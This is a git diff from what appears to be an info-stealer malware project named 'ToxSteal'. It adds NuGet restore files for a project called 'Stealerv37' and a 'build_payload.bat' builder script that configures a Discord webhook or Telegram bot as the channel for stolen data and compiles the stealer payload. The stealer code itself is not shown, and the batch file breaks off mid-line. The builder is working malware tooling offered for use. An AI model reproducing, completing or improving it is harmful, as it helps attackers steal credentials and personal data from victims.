"ref/netcore50/es/System.Threading.xml", + "ref/netcore50/fr/System.Threading.xml", + "ref/netcore50/it/System.Threading.xml", + "ref/netcore50/ja/System.Threading.xml", + "ref/netcore50/ko/System.Threading.xml", + "ref/netcore50/ru/System.Threading.xml", + "ref/netcore50/zh-hans/System.Threading.xml", + "ref/netcore50/zh-hant/System.Threading.xml", + "ref/netstandard1.0/System.Threading.dll", + "ref/netstandard1.0/System.Threading.xml", + "ref/netstandard1.0/de/System.Threading.xml", + "ref/netstandard1.0/es/System.Threading.xml", + "ref/netstandard1.0/fr/System.Threading.xml", + "ref/netstandard1.0/it/System.Threading.xml", + "ref/netstandard1.0/ja/System.Threading.xml", + "ref/netstandard1.0/ko/System.Threading.xml", + "ref/netstandard1.0/ru/System.Threading.xml", + "ref/netstandard1.0/zh-hans/System.Threading.xml", + "ref/netstandard1.0/zh-hant/System.Threading.xml", + "ref/netstandard1.3/System.Threading.dll", + "ref/netstandard1.3/System.Threading.xml", + "ref/netstandard1.3/de/System.Threading.xml", + "ref/netstandard1.3/es/System.Threading.xml", + "ref/netstandard1.3/fr/System.Threading.xml", + "ref/netstandard1.3/it/System.Threading.xml", + "ref/netstandard1.3/ja/System.Threading.xml", + "ref/netstandard1.3/ko/System.Threading.xml", + "ref/netstandard1.3/ru/System.Threading.xml", + "ref/netstandard1.3/zh-hans/System.Threading.xml", + "ref/netstandard1.3/zh-hant/System.Threading.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "runtimes/aot/lib/netcore50/System.Threading.dll", + "system.threading.4.3.0.nupkg.sha512", + "system.threading.nuspec" + ] + }, + "System.Threading.Tasks/4.3.0": { + "sha512": "LbSxKEdOUhVe8BezB/9uOGGppt+nZf6e1VFyw6v3DN6lqitm0OSn2uXMOdtP0M3W4iMcqcivm2J6UgqiwwnXiA==", + "type": "package", + "path": "system.threading.tasks/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Threading.Tasks.dll", + "ref/netcore50/System.Threading.Tasks.xml", + "ref/netcore50/de/System.Threading.Tasks.xml", + "ref/netcore50/es/System.Threading.Tasks.xml", + "ref/netcore50/fr/System.Threading.Tasks.xml", + "ref/netcore50/it/System.Threading.Tasks.xml", + "ref/netcore50/ja/System.Threading.Tasks.xml", + "ref/netcore50/ko/System.Threading.Tasks.xml", + "ref/netcore50/ru/System.Threading.Tasks.xml", + "ref/netcore50/zh-hans/System.Threading.Tasks.xml", + "ref/netcore50/zh-hant/System.Threading.Tasks.xml", + "ref/netstandard1.0/System.Threading.Tasks.dll", + "ref/netstandard1.0/System.Threading.Tasks.xml", + "ref/netstandard1.0/de/System.Threading.Tasks.xml", + "ref/netstandard1.0/es/System.Threading.Tasks.xml", + "ref/netstandard1.0/fr/System.Threading.Tasks.xml", + "ref/netstandard1.0/it/System.Threading.Tasks.xml", + "ref/netstandard1.0/ja/System.Threading.Tasks.xml", + "ref/netstandard1.0/ko/System.Threading.Tasks.xml", + "ref/netstandard1.0/ru/System.Threading.Tasks.xml", + "ref/netstandard1.0/zh-hans/System.Threading.Tasks.xml", + "ref/netstandard1.0/zh-hant/System.Threading.Tasks.xml", + "ref/netstandard1.3/System.Threading.Tasks.dll", + "ref/netstandard1.3/System.Threading.Tasks.xml", + "ref/netstandard1.3/de/System.Threading.Tasks.xml", + "ref/netstandard1.3/es/System.Threading.Tasks.xml", + "ref/netstandard1.3/fr/System.Threading.Tasks.xml", + "ref/netstandard1.3/it/System.Threading.Tasks.xml", + "ref/netstandard1.3/ja/System.Threading.Tasks.xml", + "ref/netstandard1.3/ko/System.Threading.Tasks.xml", + "ref/netstandard1.3/ru/System.Threading.Tasks.xml", + "ref/netstandard1.3/zh-hans/System.Threading.Tasks.xml", + "ref/netstandard1.3/zh-hant/System.Threading.Tasks.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.threading.tasks.4.3.0.nupkg.sha512", + "system.threading.tasks.nuspec" + ] + }, + "System.Threading.Timer/4.3.0": { + "sha512": "Z6YfyYTCg7lOZjJzBjONJTFKGN9/NIYKSxhU5GRd+DTwHSZyvWp1xuI5aR+dLg+ayyC5Xv57KiY4oJ0tMO89fQ==", + "type": "package", + "path": "system.threading.timer/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net451/_._", + "lib/portable-net451+win81+wpa81/_._", + "lib/win81/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net451/_._", + "ref/netcore50/System.Threading.Timer.dll", + "ref/netcore50/System.Threading.Timer.xml", + "ref/netcore50/de/System.Threading.Timer.xml", + "ref/netcore50/es/System.Threading.Timer.xml", + "ref/netcore50/fr/System.Threading.Timer.xml", + "ref/netcore50/it/System.Threading.Timer.xml", + "ref/netcore50/ja/System.Threading.Timer.xml", + "ref/netcore50/ko/System.Threading.Timer.xml", + "ref/netcore50/ru/System.Threading.Timer.xml", + "ref/netcore50/zh-hans/System.Threading.Timer.xml", + "ref/netcore50/zh-hant/System.Threading.Timer.xml", + "ref/netstandard1.2/System.Threading.Timer.dll", + "ref/netstandard1.2/System.Threading.Timer.xml", + "ref/netstandard1.2/de/System.Threading.Timer.xml", + "ref/netstandard1.2/es/System.Threading.Timer.xml", + "ref/netstandard1.2/fr/System.Threading.Timer.xml", + "ref/netstandard1.2/it/System.Threading.Timer.xml", + "ref/netstandard1.2/ja/System.Threading.Timer.xml", + "ref/netstandard1.2/ko/System.Threading.Timer.xml", + "ref/netstandard1.2/ru/System.Threading.Timer.xml", + "ref/netstandard1.2/zh-hans/System.Threading.Timer.xml", + "ref/netstandard1.2/zh-hant/System.Threading.Timer.xml", + "ref/portable-net451+win81+wpa81/_._", + "ref/win81/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.threading.timer.4.3.0.nupkg.sha512", + "system.threading.timer.nuspec" + ] + }, + "System.Xml.ReaderWriter/4.3.0": { + "sha512": "GrprA+Z0RUXaR4N7/eW71j1rgMnEnEVlgii49GZyAjTH7uliMnrOU3HNFBr6fEDBCJCIdlVNq9hHbaDR621XBA==", + "type": "package", + "path": "system.xml.readerwriter/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/net46/System.Xml.ReaderWriter.dll", + "lib/netcore50/System.Xml.ReaderWriter.dll", + "lib/netstandard1.3/System.Xml.ReaderWriter.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/net46/System.Xml.ReaderWriter.dll", + "ref/netcore50/System.Xml.ReaderWriter.dll", + "ref/netcore50/System.Xml.ReaderWriter.xml", + "ref/netcore50/de/System.Xml.ReaderWriter.xml", + "ref/netcore50/es/System.Xml.ReaderWriter.xml", + "ref/netcore50/fr/System.Xml.ReaderWriter.xml", + "ref/netcore50/it/System.Xml.ReaderWriter.xml", + "ref/netcore50/ja/System.Xml.ReaderWriter.xml", + "ref/netcore50/ko/System.Xml.ReaderWriter.xml", + "ref/netcore50/ru/System.Xml.ReaderWriter.xml", + "ref/netcore50/zh-hans/System.Xml.ReaderWriter.xml", + "ref/netcore50/zh-hant/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/System.Xml.ReaderWriter.dll", + "ref/netstandard1.0/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/de/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/es/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/fr/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/it/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/ja/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/ko/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/ru/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/zh-hans/System.Xml.ReaderWriter.xml", + "ref/netstandard1.0/zh-hant/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/System.Xml.ReaderWriter.dll", + "ref/netstandard1.3/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/de/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/es/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/fr/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/it/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/ja/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/ko/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/ru/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/zh-hans/System.Xml.ReaderWriter.xml", + "ref/netstandard1.3/zh-hant/System.Xml.ReaderWriter.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.xml.readerwriter.4.3.0.nupkg.sha512", + "system.xml.readerwriter.nuspec" + ] + }, + "System.Xml.XDocument/4.3.0": { + "sha512": "5zJ0XDxAIg8iy+t4aMnQAu0MqVbqyvfoUVl1yDV61xdo3Vth45oA2FoY4pPkxYAH5f8ixpmTqXeEIya95x0aCQ==", + "type": "package", + "path": "system.xml.xdocument/4.3.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/MonoAndroid10/_._", + "lib/MonoTouch10/_._", + "lib/net45/_._", + "lib/netcore50/System.Xml.XDocument.dll", + "lib/netstandard1.3/System.Xml.XDocument.dll", + "lib/portable-net45+win8+wp8+wpa81/_._", + "lib/win8/_._", + "lib/wp80/_._", + "lib/wpa81/_._", + "lib/xamarinios10/_._", + "lib/xamarinmac20/_._", + "lib/xamarintvos10/_._", + "lib/xamarinwatchos10/_._", + "ref/MonoAndroid10/_._", + "ref/MonoTouch10/_._", + "ref/net45/_._", + "ref/netcore50/System.Xml.XDocument.dll", + "ref/netcore50/System.Xml.XDocument.xml", + "ref/netcore50/de/System.Xml.XDocument.xml", + "ref/netcore50/es/System.Xml.XDocument.xml", + "ref/netcore50/fr/System.Xml.XDocument.xml", + "ref/netcore50/it/System.Xml.XDocument.xml", + "ref/netcore50/ja/System.Xml.XDocument.xml", + "ref/netcore50/ko/System.Xml.XDocument.xml", + "ref/netcore50/ru/System.Xml.XDocument.xml", + "ref/netcore50/zh-hans/System.Xml.XDocument.xml", + "ref/netcore50/zh-hant/System.Xml.XDocument.xml", + "ref/netstandard1.0/System.Xml.XDocument.dll", + "ref/netstandard1.0/System.Xml.XDocument.xml", + "ref/netstandard1.0/de/System.Xml.XDocument.xml", + "ref/netstandard1.0/es/System.Xml.XDocument.xml", + "ref/netstandard1.0/fr/System.Xml.XDocument.xml", + "ref/netstandard1.0/it/System.Xml.XDocument.xml", + "ref/netstandard1.0/ja/System.Xml.XDocument.xml", + "ref/netstandard1.0/ko/System.Xml.XDocument.xml", + "ref/netstandard1.0/ru/System.Xml.XDocument.xml", + "ref/netstandard1.0/zh-hans/System.Xml.XDocument.xml", + "ref/netstandard1.0/zh-hant/System.Xml.XDocument.xml", + "ref/netstandard1.3/System.Xml.XDocument.dll", + "ref/netstandard1.3/System.Xml.XDocument.xml", + "ref/netstandard1.3/de/System.Xml.XDocument.xml", + "ref/netstandard1.3/es/System.Xml.XDocument.xml", + "ref/netstandard1.3/fr/System.Xml.XDocument.xml", + "ref/netstandard1.3/it/System.Xml.XDocument.xml", + "ref/netstandard1.3/ja/System.Xml.XDocument.xml", + "ref/netstandard1.3/ko/System.Xml.XDocument.xml", + "ref/netstandard1.3/ru/System.Xml.XDocument.xml", + "ref/netstandard1.3/zh-hans/System.Xml.XDocument.xml", + "ref/netstandard1.3/zh-hant/System.Xml.XDocument.xml", + "ref/portable-net45+win8+wp8+wpa81/_._", + "ref/win8/_._", + "ref/wp80/_._", + "ref/wpa81/_._", + "ref/xamarinios10/_._", + "ref/xamarinmac20/_._", + "ref/xamarintvos10/_._", + "ref/xamarinwatchos10/_._", + "system.xml.xdocument.4.3.0.nupkg.sha512", + "system.xml.xdocument.nuspec" + ] + } + }, + "projectFileDependencyGroups": { + ".NETFramework,Version=v4.6.2": [ + "Costura.Fody >= 5.7.0", + "Fody >= 6.8.0", + "Microsoft.NETFramework.ReferenceAssemblies >= 1.0.3", + "Newtonsoft.Json >= 13.0.3" + ] + }, + "packageFolders": { + "C:\\Users\\User\\.nuget\\packages\\": {}, + "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages": {} + }, + "project": { + "version": "1.0.0", + "restore": { + "projectUniqueName": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "projectName": "Stealerv37", + "projectPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "packagesPath": "C:\\Users\\User\\.nuget\\packages\\", + "outputPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\obj\\", + "projectStyle": "PackageReference", + "fallbackFolders": [ + "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages" + ], + "configFilePaths": [ + "C:\\Users\\User\\AppData\\Roaming\\NuGet\\NuGet.Config", + "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.FallbackLocation.config", + "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" + ], + "originalTargetFrameworks": [ + "net462" + ], + "sources": { + "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, + "https://api.nuget.org/v3/index.json": {} + }, + "frameworks": { + "net462": { + "targetAlias": "net462", + "projectReferences": {} + } + }, + "warningProperties": { + "warnAsError": [ + "NU1605" + ] + }, + "restoreAuditProperties": { + "enableAudit": "true", + "auditLevel": "low", + "auditMode": "direct" + }, + "SdkAnalysisLevel": "10.0.100" + }, + "frameworks": { + "net462": { + "targetAlias": "net462", + "dependencies": { + "Costura.Fody": { + "include": "Runtime, Build, Native, ContentFiles, Analyzers, BuildTransitive", + "suppressParent": "All", + "target": "Package", + "version": "[5.7.0, )" + }, + "Fody": { + "include": "Runtime, Build, Native, ContentFiles, Analyzers, BuildTransitive", + "suppressParent": "All", + "target": "Package", + "version": "[6.8.0, )" + }, + "Microsoft.NETFramework.ReferenceAssemblies": { + "suppressParent": "All", + "target": "Package", + "version": "[1.0.3, )", + "autoReferenced": true + }, + "Newtonsoft.Json": { + "target": "Package", + "version": "[13.0.3, )" + } + }, + "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\10.0.101\\RuntimeIdentifierGraph.json" + } + }, + "runtimes": { + "win-x64": { + "#import": [] + } + } + } +} \ No newline at end of file diff --git a/New/obj/project.nuget.cache b/New/obj/project.nuget.cache new file mode 100644 index 0000000..2c56c3e --- /dev/null +++ b/New/obj/project.nuget.cache @@ -0,0 +1,60 @@ +{ + "version": 2, + "dgSpecHash": "/kCX7NxSErs=", + "success": true, + "projectFilePath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "expectedPackageFiles": [ + "C:\\Users\\User\\.nuget\\packages\\costura.fody\\5.7.0\\costura.fody.5.7.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\fody\\6.8.0\\fody.6.8.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\microsoft.netcore.platforms\\1.1.0\\microsoft.netcore.platforms.1.1.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\microsoft.netframework.referenceassemblies\\1.0.3\\microsoft.netframework.referenceassemblies.1.0.3.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\microsoft.netframework.referenceassemblies.net462\\1.0.3\\microsoft.netframework.referenceassemblies.net462.1.0.3.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\microsoft.win32.primitives\\4.3.0\\microsoft.win32.primitives.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\netstandard.library\\1.6.1\\netstandard.library.1.6.1.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\newtonsoft.json\\13.0.3\\newtonsoft.json.13.0.3.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.appcontext\\4.3.0\\system.appcontext.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.collections\\4.3.0\\system.collections.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.collections.concurrent\\4.3.0\\system.collections.concurrent.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.console\\4.3.0\\system.console.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.diagnostics.debug\\4.3.0\\system.diagnostics.debug.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.diagnostics.diagnosticsource\\4.3.0\\system.diagnostics.diagnosticsource.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.diagnostics.tools\\4.3.0\\system.diagnostics.tools.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.diagnostics.tracing\\4.3.0\\system.diagnostics.tracing.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.globalization\\4.3.0\\system.globalization.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.globalization.calendars\\4.3.0\\system.globalization.calendars.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.io\\4.3.0\\system.io.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.io.compression\\4.3.0\\system.io.compression.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.io.compression.zipfile\\4.3.0\\system.io.compression.zipfile.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.io.filesystem\\4.3.0\\system.io.filesystem.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.io.filesystem.primitives\\4.3.0\\system.io.filesystem.primitives.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.linq\\4.3.0\\system.linq.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.linq.expressions\\4.3.0\\system.linq.expressions.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.net.http\\4.3.0\\system.net.http.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.net.primitives\\4.3.0\\system.net.primitives.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.net.sockets\\4.3.0\\system.net.sockets.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.objectmodel\\4.3.0\\system.objectmodel.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.reflection\\4.3.0\\system.reflection.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.reflection.extensions\\4.3.0\\system.reflection.extensions.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.reflection.primitives\\4.3.0\\system.reflection.primitives.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.resources.resourcemanager\\4.3.0\\system.resources.resourcemanager.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.runtime\\4.3.0\\system.runtime.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.runtime.extensions\\4.3.0\\system.runtime.extensions.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.runtime.handles\\4.3.0\\system.runtime.handles.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.runtime.interopservices\\4.3.0\\system.runtime.interopservices.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.runtime.interopservices.runtimeinformation\\4.3.0\\system.runtime.interopservices.runtimeinformation.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.runtime.numerics\\4.3.0\\system.runtime.numerics.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.security.cryptography.algorithms\\4.3.0\\system.security.cryptography.algorithms.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.security.cryptography.encoding\\4.3.0\\system.security.cryptography.encoding.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.security.cryptography.primitives\\4.3.0\\system.security.cryptography.primitives.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.security.cryptography.x509certificates\\4.3.0\\system.security.cryptography.x509certificates.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.text.encoding\\4.3.0\\system.text.encoding.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.text.encoding.extensions\\4.3.0\\system.text.encoding.extensions.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.text.regularexpressions\\4.3.0\\system.text.regularexpressions.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.threading\\4.3.0\\system.threading.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.threading.tasks\\4.3.0\\system.threading.tasks.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.threading.timer\\4.3.0\\system.threading.timer.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.xml.readerwriter\\4.3.0\\system.xml.readerwriter.4.3.0.nupkg.sha512", + "C:\\Users\\User\\.nuget\\packages\\system.xml.xdocument\\4.3.0\\system.xml.xdocument.4.3.0.nupkg.sha512" + ], + "logs": [] +} \ No newline at end of file diff --git a/build_payload.bat b/build_payload.bat new file mode 100755 index 0000000..f13a284 --- /dev/null +++ b/build_payload.bat @@ -0,0 +1,736 @@ +@echo off +setlocal enabledelayedexpansion +title ToxSteal Builder @tcixt + +REM Load config +set "CONFIG_FILE=builder_config.json" +if not exist "%CONFIG_FILE%" ( + call :create_default_config +) + +REM Parse config using PowerShell +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_bot_token_placeholder"') do set "BOT_TOKEN_PLACEHOLDER=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_chat_id_placeholder"') do set "CHAT_ID_PLACEHOLDER=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_webhook_placeholder"') do set "WEBHOOK_PLACEHOLDER=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.test_connection_enabled"') do set "TEST_ENABLED=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_delivery_method"') do set "LAST_DELIVERY=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_bot_token"') do set "LAST_BOT_TOKEN=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_chat_id"') do set "LAST_CHAT_ID=%%a" +for /f "delims=" %%a in ('powershell -Command "$config = Get-Content '%CONFIG_FILE%' | ConvertFrom-Json; $config.last_webhook_url"') do set "LAST_WEBHOOK=%%a" + +:show_logo +cls +echo. +echo. +echo mmmmmmmm ## mmmm mmmm +echo """##""" "" m#""""# ## ""## +echo ## m####m "## ##" #### ##m ####### m####m m#####m ## +echo ## ##" "## #### ## "####m ## ##mmmm## " mmm## ## +echo ## ## ## m##m ## "## ## ##"""""" m##"""## ## +echo ## "##mm##" m#""#m mmm##mmm #mmmmm#" ##mmm "##mmmm# ##mmm### ##mmm +echo "" """" """ """ """""""" """"" """" """"" """" "" """" +echo. +echo Toxi stealer Payload Builder +echo Developer: @tcixt +echo. +echo ======================================================================================================================== +echo. +goto main_menu + +:main_menu +echo [MAIN MENU] +echo. +echo [1] Build Payload +echo [2] Settings +echo [3] Exit +echo. +set /p main_choice="Select option (1-3): " + +if "%main_choice%"=="1" goto build_method +if "%main_choice%"=="2" goto settings_menu +if "%main_choice%"=="3" goto exit +echo Invalid choice. Please try again. +timeout /t 2 >nul +goto show_logo + +:settings_menu +cls +call :show_logo_small +echo [SETTINGS] +echo. +echo Current Settings: +echo. +if "%TEST_ENABLED%"=="True" ( + echo [1] Connection Test: ENABLED +) else ( + echo [1] Connection Test: DISABLED +) +echo. +echo [2] View Current Placeholders +echo [3] Reset Config to Defaults +echo [4] Back to Main Menu +echo. +set /p settings_choice="Select option (1-4): " + +if "%settings_choice%"=="1" goto toggle_test +if "%settings_choice%"=="2" goto view_placeholders +if "%settings_choice%"=="3" goto reset_config +if "%settings_choice%"=="4" goto show_logo +echo Invalid choice. +timeout /t 2 >nul +goto settings_menu + +:toggle_test +if "%TEST_ENABLED%"=="True" ( + set "TEST_ENABLED=False" + echo Connection test DISABLED +) else ( + set "TEST_ENABLED=True" + echo Connection test ENABLED +) +call :save_config +timeout /t 2 >nul +goto settings_menu + +:view_placeholders +cls +call :show_logo_small +echo [CURRENT PLACEHOLDERS] +echo. +echo Bot Token Placeholder: %BOT_TOKEN_PLACEHOLDER% +echo Chat ID Placeholder: %CHAT_ID_PLACEHOLDER% +echo Webhook Placeholder: %WEBHOOK_PLACEHOLDER% +echo. +if not "%LAST_BOT_TOKEN%"=="" ( + echo Last Used Values: + echo Bot Token: %LAST_BOT_TOKEN% + echo Chat ID: %LAST_CHAT_ID% + echo Webhook: %LAST_WEBHOOK% +) +echo. +echo Press any key to return... +pause >nul +goto settings_menu + +:reset_config +echo. +echo Resetting config to defaults... +call :create_default_config +echo Config reset complete! +timeout /t 2 >nul +goto show_logo + +:build_method +cls +call :show_logo_small +echo [BUILD METHOD SELECTION] +echo. +echo Choose your build environment: +echo. +echo [1] .NET SDK (dotnet build) - Recommended +echo [2] MSBuild (msbuild.exe) - Visual Studio Tools +echo [3] Visual Studio (devenv.exe) - Full IDE +echo [4] Back to Main Menu +echo. +set /p build_choice="Select option (1-4): " + +if "%build_choice%"=="1" ( + set "BUILD_METHOD=dotnet" + goto delivery_menu +) +if "%build_choice%"=="2" ( + set "BUILD_METHOD=msbuild" + goto delivery_menu +) +if "%build_choice%"=="3" ( + set "BUILD_METHOD=devenv" + goto delivery_menu +) +if "%build_choice%"=="4" goto show_logo +echo Invalid choice. Please try again. +timeout /t 2 >nul +goto show_logo + +:delivery_menu +cls +call :show_logo_small +echo [DELIVERY METHOD SELECTION] +echo. +echo Build Method: %BUILD_METHOD% +if not "%LAST_DELIVERY%"=="" ( + echo Last Used: %LAST_DELIVERY% +) +echo. +echo Choose your delivery method: +echo. +echo [1] Discord Webhook - Send to Discord channel +echo [2] Telegram Bot - Send to Telegram chat +echo [3] Back to build method +echo. +set /p choice="Select option (1-3): " + +if "%choice%"=="1" goto discord_webhook +if "%choice%"=="2" goto telegram_bot +if "%choice%"=="3" goto build_method +echo Invalid choice. Please try again. +timeout /t 2 >nul +goto delivery_menu + +:discord_webhook +cls +call :show_logo_small +echo [DISCORD WEBHOOK CONFIGURATION] +echo. +echo Build Method: %BUILD_METHOD% +echo Delivery: Discord Webhook +echo. +if not "%LAST_WEBHOOK%"=="" ( + echo Last used webhook: %LAST_WEBHOOK% + echo. + echo Enter "0" to use last webhook, or enter new webhook URL: +) else ( + echo Enter your Discord webhook URL: +) +echo (Example: https://discord.com/api/webhooks/...) +echo. +set /p webhook_url="Webhook URL: " + +if "%webhook_url%"=="0" ( + if "%LAST_WEBHOOK%"=="" ( + echo Error: No previous webhook found! + timeout /t 3 >nul + goto delivery_menu + ) + set "webhook_url=%LAST_WEBHOOK%" + echo Using last webhook... +) + +if "%webhook_url%"=="" ( + echo Error: 